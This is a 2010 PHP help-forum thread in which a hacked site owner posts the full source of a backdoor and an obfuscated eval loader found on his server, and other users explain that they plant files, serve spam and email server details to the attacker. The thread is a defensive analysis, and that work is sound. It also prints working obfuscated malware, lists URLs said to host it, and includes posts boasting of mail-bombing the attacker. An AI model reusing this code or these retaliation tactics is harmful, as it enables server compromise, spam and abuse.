deansatch Posted January 15, 2010 Share Posted January 15, 2010 I recently had my site hacked and found hundreds of hidden links had appeared at the bottom of my index page.There were some newly created error.log files and there was a newly created php file in the root directory as well. Here are the contents of the php file if anyone can read through it and explain what this code does: <?php error_reporting(0); $srand = "548"; $q = "due"; $abbr = "calyptra"; $ftro = "creation"; $admin = "i"; $relwrit = "./"; $_1 = "y"; $_2="o"; $_3 = "u"; $base = "cnV0aWxzLmNvbQ=="; if($_GET[$ftro]){ $zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/1.txt"); print str_replace("<?"."="."$"."q"."?>",$q,str_replace("<?="."$"."abbr"."?>",$abbr,$zz)); exit; } if($_GET['touch']){ if(file_exists("index.php")) $nm = "index.php"; if(file_exists("index.html")) $nm = "index.html"; if(file_exists("index.shtml")) $nm = "index.shtml"; if(file_exists("index.phtml")) $nm = "index.phtml"; if(file_exists("index.htm")) $nm = "index.htm"; print "Touching... ".$_SERVER['PHP_SELF']; $time = @filemtime($nm); if(@touch($_SERVER['PHP_SELF'],$time)) print "....OK"; exit; } if($_GET['httpd_setup']){ $d = dir("./"); while (false !== ($entry = $d->read())) { if($entry!="."&&$entry!=".."){ if(is_dir($entry))$go[] = $entry; } } $d->close(); function qq($length = 5) { $password = ""; $possible = "aaskljasdjabzcxnmaeoipqrehwejkavansbvsnadbv"; $i = 0; while ($i < $length) { $char = substr($possible, mt_rand(0, strlen($possible)-1), 1); if (!strstr($password, $char)) { $password .= $char; $i++; } } return $password; }; $i = "UTJsU01FbEVNR2RKYVRSMVRIbEpOME5wVW5sSlJEQm5TV2sxYjJSSE1YTkphbk5MWVZkWmIwbFhXbkJpUjFabVdsaG9jR016VW5wTFExSXdUR2xLY0dKdFVteGxRMGwxU2toSmNFdFRRV3RqYVVFNVNVTkpkV0ZJVW5SSmFuTkxZVmRaYjBsWFduQmlSMVptV2xob2NHTXpVbnBMUTFJd1RHbEtjR0p0VW14bFEwbDFTa2hKY0V0VFFXdGphVUU1U1VOSmRXTkhhSGRKYW5OTFEyMXNiVXREVW1aU01GWlZWM2xrYUZwSFVXNVlVMnczUTJsU2VWcFhSbXRKUkRCbllVaFNkR0pHT1d4aWJsSndaRWhzWmxwSFZtcGlNbEpzUzBkc2RHTkhlSFphUjFWdlNubGpjMXB0YkhOYVUyZHJaRU0wYVdGWE5XdGFXR2RwVEdsU2VVdFRhM0JQZDI5TFlWZFpiMGxYVm5sYVYyTnZTV3AzYUV4VE1VMVRWVFZNVlhreFRWTlZOVXhWZVRCMFVHbEpjMHBJU214WlYxRndTMWh6UzBOVFVtMWpRMEU1U1VkYWRtTkhWblZMUTFJd1RHbEtjR0p0VW14bFEwbDFTa2hKYzBsdVkybExWSE5MUTFkc2JVdEhXak5qYld3d1dsTm5hMXB1UVhOS1NFcHNXVmRSZFVsc2VIVlFRMFYwVEZWNFNsUnJkRlJNVlhoS1ZHdDBWRXhUTUN0SmFXdHdTVWhDZVdGWE5UQkpRMHBVV2xoU01XTkhWbXRNYVRSMVNXcHpTME5YV21waVJ6bDZXbE5uYTFwdVFYQlBkM0E1U1VkV2MyTXlWV2RqU0Vwd1ltNVJaMGxyUm5OamJWWm9Xa2hyZFV4cE5IVkphbk5MUTI0d1MwTnRiRzFMUTFKbVVqQldWVmQ1WkcxS01UQndaWGR2YTFwcFFUbEpSMXB3WWtkV1psb3lWakJZTWs1MlltNVNiR0p1VW5wTFExSm1VakJXVlZkNVpHMUtNVEJ3VDNkd2QyTnRiSFZrUTBGcldtcHpTMHBJU214WlYxRm5VRk5DYjJSSE1YTllNbFoxWkVkc01HVldPV3RhVjA1MldrZFZiMkZYTVhkaVJ6bHJXbE5uYmtwNWVHMWhWM2hzUzBOU01FeHBTbkJpYlZKc1pVTkpkVXBJU1hCTFUyczNRMjFzYlV0SFZubGFWMk52U1dwM2FFeFRNVTFUVlRWTVZYa3hUVk5WTlV4VmVUQjBVR2xKYzBwSVNteFpWMUZ3UzFoelMwTlJhMnRhV0dkblVGTkNiR1ZJUW5OaU1sSnNTME5KT0VsVE1IUlVSV3hQVXpGTmRGUkZiRTlUTVUxMFRGUTBhVXhEVW5sYVYwWnJTMVJ6UzBOUmEydGFibU5uVUZOQmExcFlhR0pOUmpCMVNXcDNhRXhUTVUxVFZUVk1WWGt4VFZOVk5VeFZlVEIwVUdsSmRVcEhXVGREWjJ0S1NrZGFkMGxFTUdkYWJUbDNXbGMwYjBwSVVYVkpiV3gxV2tkV05FbHBOR3RqYVhkcFpIbEpjRTkzYjBwRFYyeHRTMGRhTTJOdGJEQmFVMmRyV201QmMwcEhXak5MVTJ0blkwaEtjR0p1VVdkSmFuaHZUVlExTjFRd2MyaG1WSGQyWVVSRkswbHFjMHREVVd4dFdUSjRkbU15Vlc5S1IxcDNTMVJ6UzJaUmIwdG1VVzg5"; $scrp = base64_decode(base64_decode(base64_decode($i))); $towrite = $go[mt_rand(0,count($go)-1)]; $qq = qq(); $fp = fopen($towrite."/".$qq.".php","w"); if(fwrite($fp,"<?php ".$scrp." ?>")) print "http://".$_SERVER['HTTP_HOST']."/".$towrite."/".$qq.".php"; else print "false"; fclose($fp); exit; } if($_GET[$q]||$_GET[$admin]): function IsBot() { global $ref; if(substr_count($ref,"&")<3) return true; else return false; }; function IsRefSE() { global $ref; if(substr_count($ref,"&")>2) return true; else return false; }; function logit($fname, $str){ $fp = @fopen ($fname, "a+"); @fwrite ($fp, $str); @fclose ($fp); if(file_exists("index.php")) $nm = "index.php"; if(file_exists("index.html")) $nm = "index.html"; if(file_exists("index.shtml")) $nm = "index.shtml"; if(file_exists("index.phtml")) $nm = "index.phtml"; if(file_exists("index.htm")) $nm = "index.htm"; $time = @filemtime($nm); @touch($fname,$time); }; $ref = $_SERVER['HTTP_REFERER']; $varquery = $_GET[$q]; $host = $_SERVER["HTTP_HOST"]; $agent = $_SERVER["HTTP_USER_AGENT"]; $ips = $_SERVER['REMOTE_ADDR']; $req = $_SERVER["REQUEST_URI"]; $http = $_SERVER['HTTP_HOST']; $self = $_SERVER['PHP_SELF']; if(ereg("index",$self)) $self = str_replace("index.php","",$self); if ($_GET[$admin]=='b'){ print '<pre>'.@file_get_contents($relwrit.'error.log').'</pre>'; exit; } if ($_GET[$admin]=='s'){ print '<pre>'.@file_get_contents($relwrit.'error1.log').'</pre>'; exit; } if ($_GET[$admin]=='n'){ print '<pre>'.@file_get_contents($relwrit.'error2.log').'</pre>'; exit; } if (IsBot()==true){ logit($relwrit."error.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n"); } else if(IsRefSE()==true) { logit($relwrit."error1.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$ref."\t".$agent."\t".$ips."\n"); $zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/2.txt"); header("Location: ".$zz); exit; } else { logit($relwrit."error2.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n"); } function GetPage($url) { $url=str_replace("http://", "", $url); $host=substr($url,0,strpos($url,"/")); $path=substr($url,strpos($url,"/")); $skt = @fsockopen($host, 80); if (!$skt) return false; $requestHeader = "GET ".$path." HTTP/1.1\r\n"; $requestHeader.= "Host: ".$host."\r\n"; $requestHeader.= "Connection: close\r\n\r\n"; fwrite($skt, $requestHeader); $responseHeader = ""; $responseContent = ""; do{ $responseHeader.= fread($skt, 1); } while (!preg_match("/\r\n\r\n$/", $responseHeader)); if (!strstr($responseHeader, "Transfer-Encoding: chunked")) { while (!feof($skt)) { $responseContent.= fgets($skt, 128); } } else { while ($chunk_length = hexdec(fgets($skt))) { $responseContentChunk = ""; $read_length = 0; while ($read_length < $chunk_length) { $responseContentChunk .= fread($skt, $chunk_length - $read_length); $read_length = strlen($responseContentChunk); } $responseContent.= $responseContentChunk; fgets($skt); } } return chop($responseContent); }; function GetRelatedGoogle($q) { global $srand; $q=trim(strtolower($q)); $url="http://www.google.com/search?hl=en&safe=off&tbo=1&q=".urlencode($q)."&tbs=clue:1"; $content=GetPage($url); preg_match_all("#sceq(.*)amp#U", $content, $result_preg); foreach($result_preg[0] as $op){ $op = str_replace("sceq:","",$op); $op = str_replace("&","",$op); $op = str_replace("+"," ",$op); $op = str_replace("amp"," ",$op); @$arr[] = $op; } srand($srand); shuffle($arr); $result=$arr; return $result; }; function GetRelated($q){ $q=trim(strtolower($q)); $url="http://www.google.com/trends/hottrends?q=".urlencode($q); $content=GetPage($url); preg_match_all("#<b>Related searches:</b><br>(.*)<br><br>#U", $content, $result_preg); $result=trim($result_preg[1][0]); $result=explode(',',$result); return $result; }; function GetYoutube($q){ global $relwrit; $q=urlencode(trim(strtolower($q))); $url = "http://www.youtube.com/results?search_query=".$q."&search_type=&aq=f"; $content=GetPage($url); preg_match_all('#video-long-title-(.*)"#U', $content, $result_preg); $result = $result_preg[1]; return $result; } $page = ucwords(str_replace("-"," ",$_GET[$q])); $page = ucwords($page); $serp = GetPage("http://www.google.com/search?hl=en&as_q=".urlencode(strtolower($page))."&as_epq=&as_oq=&as_eq=&num=32&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=(cc_publicdomain|cc_attribute|cc_sharealike|cc_noncommercial).-(cc_nonderived)&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images"); preg_match_all('#<div class="s">(.*)<b>...</b></div>#U',$serp,$rs); $newsg = array(); foreach($rs[1] as $output){ $output = html_entity_decode(strip_tags($output)); $newsg[] = $output; } $serp2 = GetPage("http://www.google.com/search?hl=en&sa=G&tbo=1&q=".urlencode(strtolower($page))."&tbs=nws:1&num=39"); preg_match_all("#</nobr><br><div>(.*)</div>#U",$serp2,$rs2); foreach($rs2[1] as $output2){ $output2 = html_entity_decode(strip_tags($output2)); $newsg[] = $output2; } @srand($srand); @shuffle($newsg); $today = date("F d, Y"); $rels = GetRelated($page); foreach($rels as $kro){ $kro = trim($kro); $url = str_replace(" ","-",$kro); if($kro) $relis .= "<li> <a href=\"http://{$http}{$self}?{$q}={$url}\">".ucwords($kro)."</a> </li> "; } @srand(633); @shuffle($relis); $cont = ''; for($i=0;$i<count($newsg);$i++){ $cont .= "".str_replace("...","",trim(ucfirst($newsg[$i]))).". <br /><br />\n\n "; } $rel = GetRelatedGoogle($page); for($i=0;$i<count($rel);$i++){ $undretit .= "".trim($rel[$i]).", "; } $undretit = substr(trim($undretit), 0, -1); $relis = substr(trim($relis), 0, -1); /* */ //******************************* if($_GET['ddd']){ $susel = ''; $over = ''; $alrt = ''; }else{ //$susel = "<script>".$q."('".$abbr."', '".$page."');</script>"; //$over = "style=\"overflow: hidden;\""; $susel = ''; $over = ''; } $pg = " <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\" dir=\"ltr\"> <head profile=\"http://www.webdevout.net/profile/1.5/\"> <title>$page</title> $susel </head> <style> *{ font-family: Courier New; } hr { height:2px; color:#263731 #rauki{ left: 296px; height: 616px; margin: 23px; } #abelu{ background-color: #616283; } #ubeal{ color: #663061; font-family: Times New Roman; } #irebo{ font-size: 25px; } #eolud{ } #kuoiabr{ border: 5px #672045 dashed; font-size: 13px; color: #192957; } #earldbo{ border: 5px #124619 solid; font-size: 15px; color: #353664; } #oerlka{ color: #399028; border: 9px #895357 dotted; font-size: 12px; } #ardule{ color: #214920; border: 5px #163620 dashed; font-size: 15px; } #irkude{ color: #427449; border: 7px #485044 dashed; font-size: 11px; } #eabrou{ color: #141898; border: 5px #859459 dashed; font-size: 11px; } </style> </head> <body id=\"abelu\"> <div id=\"rauki\"> <h4 id=\"ubeal\">$page</h4> <p><div><br /> <div></p> <div id=\"oerlka\"> <div id=\"ardule\"> <div id=\"irkude\"> <div id=\"eabrou\"> <h2>$today $page</h2> <div id=\"irebo\">$cont</div> <ol> $relis </ol> </div> </div> </div> </div> <div id=\"eolud\"> <div id=\"kuoiabr\"> <div id=\"earldbo\"> $undretit </div> </div> </div> </div> </body> </html> "; print $pg; exit; endif; ?> Quote Link to comment Share on other sites More sharing options...
RichardRotterdam Posted January 15, 2010 Share Posted January 15, 2010 Looking at just the first few lines it looks like it's injecting php code into that php file from a different domain. However I suggest you search for what's causing this rather then what's doing it. Quote Link to comment Share on other sites More sharing options...
deansatch Posted January 15, 2010 Author Share Posted January 15, 2010 I thought this script might give some clues about how it got there in the first place or where it came from Quote Link to comment Share on other sites More sharing options...
Buddski Posted January 15, 2010 Share Posted January 15, 2010 That file was uploaded to your server (no idea how) but it basically has given the person responsible the ability to execute PHP.. First it reads a file from yourutils.com/1.txt ( a repoted hack site ) which runs a few eval functions on your system. Further down in the code it iterated through your file system to find the index file type you are using and appends some of its stuff in there. Thats as far as ive gotten thus far but from other looks I would assume that they are using those created log files to change their methods to suit your server.. I wouldnt REALLY worry about what it does.. Just how it got there and future prevention. Do you have any upload scripts on your server? Quote Link to comment Share on other sites More sharing options...
deansatch Posted January 15, 2010 Author Share Posted January 15, 2010 Thanks How it got there is a mystery. I have no upload scripts or forms. I am a hosting reseller and noticed that 3 of my customers sites had the same hack. I also noticed that the hundreds of links that were appended to the page were all customers of the same hosting company that I resell (according to whois). Each link had a randomly named php file at the end e.g. domain.com/hackfile.php?hyt=a_story_about_someone Of course the hosting company in question denied that it was a hole in their security and that it must have been my site that was hacked. Quote Link to comment Share on other sites More sharing options...
Buddski Posted January 15, 2010 Share Posted January 15, 2010 Hrmm it could be your provider that is the problem if other customers are having the same issue.. Quote Link to comment Share on other sites More sharing options...
RichardRotterdam Posted January 15, 2010 Share Posted January 15, 2010 If you are using a ftp client to upload your files and you saved the passwords in that client, there is a possibility that a virus stole those passwords. Also try a search on this forum, you might find topics that could be of use to you. here are some: http://www.phpfreaks.com/forums/index.php/topic,268580.msg1267048.html#msg1267048 http://www.phpfreaks.com/forums/index.php/topic,252960.msg1188182.html#msg1188182 http://www.phpfreaks.com/forums/index.php/topic,249837.msg1170921.html#msg1170921 Quote Link to comment Share on other sites More sharing options...
oni-kun Posted January 15, 2010 Share Posted January 15, 2010 Yes, it seems one way or another they found an exploit in the permissions or script structure and executed a shell to upload files to batch away at their will with their poorly written code. I'd recommend to change all passwords, Especially your (cPanel|Plesk) and FTP/admin area. It may be a good idea to check server logs (apache's) and see if there was anything going on from a client, or it was an 'inside job'. EDIT: '$fp = fopen($towrite."/".$qq.".php","w");' , The script may be spreading itself. Quote Link to comment Share on other sites More sharing options...
deansatch Posted January 15, 2010 Author Share Posted January 15, 2010 The host I use allows me and any of it's customers to log on with SSH access which apparently enables anyone to access any other accounts files on the server - but accessing any files other than your own is forbidden and logged...apparently. Do you think one customer could have logged in to the server this way undetected or just took the risk of not being noticed and planted the files, or even a single file that can spread to all index pages on the server? Quote Link to comment Share on other sites More sharing options...
deansatch Posted January 16, 2010 Author Share Posted January 16, 2010 Quick update if anyone can help. I tracked down a text file that the hacker has somehow managed to run on my site - it is hosted on another victims site. The text contains the following code: <?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?> <? function d($s, $k='') { if($k=='') { for($i=0;$i<strlen($s);$i){ $d.=chr(hexdec(substr($s, $i, 2))); $i=(float)($i)+2; } return $d;} else{ $r=''; $f=d('6261736536345f6465636f6465'); $u=$f('Z3ppbmZsYXRl'); $s=$u($f($s)); for($i=0; $i<strlen($s);$i++){ $c=substr($s, $i, 1); $kc=substr($k, ($i%strlen($k))-1, 1); $c=chr(ord($c)-ord($kc)); $r.=$c; }return $r; } } eval(d("VZL7TuJAGMUfbfcV1HUJoMnakVvqLUqhpVNoYVpmaBvRXul0hqq0XOpGH3HR7CbuvyfnJL/zfYdGtTov8jSv/VzXj3pGr3K8ub4STo7HqFKl+Span1aKXwd3unRY2d5cs0eeh/WT94im1Wq1dvleXS55eHh98EODRvmAZcFrwCtnqZWONRPslsnnQGS2mfAZacvhdFvgZ+ohhhtmKsnB0iAou6PojbzMqbo1TJiPty2oSZNXx3H5PQAbW8H5pORpcN5fuu6zqKeiMaBcHEqktInN4yWg9pmjEIGqVt9JNGul97hJ50TnhqmtogHZGLSzgbzF7gVdtrirYr5bmvJkitUL1Rb0qQrATpNvTIRVYtqabwhQtjBRMSARxirUmqCj3wqaqrRZQJx4bN5tfU2KKW4lHsGrobWLocK2UAGLB4AFm7RbQ8lAaCqMyYDE2EJ9i+67lXLqzW7Lf75H5eItUoymTSYs5MkXvvL/LAef2aAxpT7vinoXxZZAMGEuImWgEtWc3J8lYwugF3vP0ptkLHCNTJeExYCXO8Q0E1nZQoNakgAceBnZOaTNVKXXhrK5nmPAidKW45myCBrDD42mpJv4DeMp5G+FiW8/tOekv1ujD+Ze8dlX512WKCHzS3jRnxSpk6mbAO/5Uqf0zoEIJb2Ag6D0XbTWmRiTV8BH9O/feItOFbTxzssepGI6AyMZP7myw/IMyeYMyzcDC4ym+9uvddqk+hboAdGefClefNnaBu53EBL1ZSR32YLomSZ1Mzcz1r6Zdo5vjqLfj7zmeUXSaYZBFGRhfFrhqziq1y6/f4t3WX75Bw==", 1235327122)); ?> Does anyone know what this code is supposed to be trying to do? Quote Link to comment Share on other sites More sharing options...
Buddski Posted January 17, 2010 Share Posted January 17, 2010 Its grabs a whole heap of your server settings and emails it.. $creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON")$safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from); the email's are being sent to ban.dage07@gmail.com Quote Link to comment Share on other sites More sharing options...
oni-kun Posted January 17, 2010 Share Posted January 17, 2010 Its grabs a whole heap of your server settings and emails it.. $creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON")$safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from); the email's are being sent to ban.dage07@gmail.com Botnet + gmail's lack of origin awareness checking = .. I sent atleast 72k e-mails with random .cn domain names. Bleh, anyway, selecting secure passwords on the first place is a good thing OP, I'd recommend evaluating every aspect of your web server and scripts (a backup?) and start new, not your fault. Quote Link to comment Share on other sites More sharing options...
redarrow Posted January 17, 2010 Share Posted January 17, 2010 This is a example why validating all your code is so important. also show's you why members must have accounts to upload stuff. Dam people. so many people wanting to get account info/ user names/passwords. as hosting get cheaper, the more people want to use other peoples accounts. sheared host are so bad these days due to lack off security. makes me so mad... Quote Link to comment Share on other sites More sharing options...
deansatch Posted January 17, 2010 Author Share Posted January 17, 2010 Nice work people! Thanks! So now we have his email, can anything be done about it? Quote Link to comment Share on other sites More sharing options...
oni-kun Posted January 17, 2010 Share Posted January 17, 2010 Nice work people! Thanks! So now we have his email, can anything be done about it? I sent him 74k e-mails of his own code, so I think he'll be busy enough to miss yours. There isn't much to be done really, just not many laws in place that can really support this, or prove it. Quote Link to comment Share on other sites More sharing options...
deansatch Posted January 17, 2010 Author Share Posted January 17, 2010 I also have these links where the hackers code is still hosted - is he using unsuspecting victims websites to host his code on or would these be his own sites? The actual sites look fairly respectable and honest. http://disk.yonghyuk.pe.kr/comet/id1.txt http://musicadelibreria.net/footer http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt Quote Link to comment Share on other sites More sharing options...
oni-kun Posted January 17, 2010 Share Posted January 17, 2010 I also have these links where the hackers code is still hosted - is he using unsuspecting victims websites to host his code on or would these be his own sites? The actual sites look fairly respectable and honest. http://disk.yonghyuk.pe.kr/comet/id1.txt http://musicadelibreria.net/footer http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt http://whois.domaintools.com/musicadelibreria.net http://www.nic.ru/whois/?query=forex-biznes.ru They look like to be honest botnetted/ or a relay from an infected site like your own. Be sure to block any data coming/going to these adresses you may want to disallow the IPs of them in a .htaccess file to deny any possible traffic for later preventative measures. Quote Link to comment Share on other sites More sharing options...
mga_ka_php Posted February 23, 2010 Share Posted February 23, 2010 my website has been hacked also. just found r3m1ck.html file in my public_html. didn't find any other files. but i removed all of my web files and reuploaded again. Quote Link to comment Share on other sites More sharing options...
jay7981 Posted February 23, 2010 Share Posted February 23, 2010 add another 150k emails from me with a small surprise in a fe of them ... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.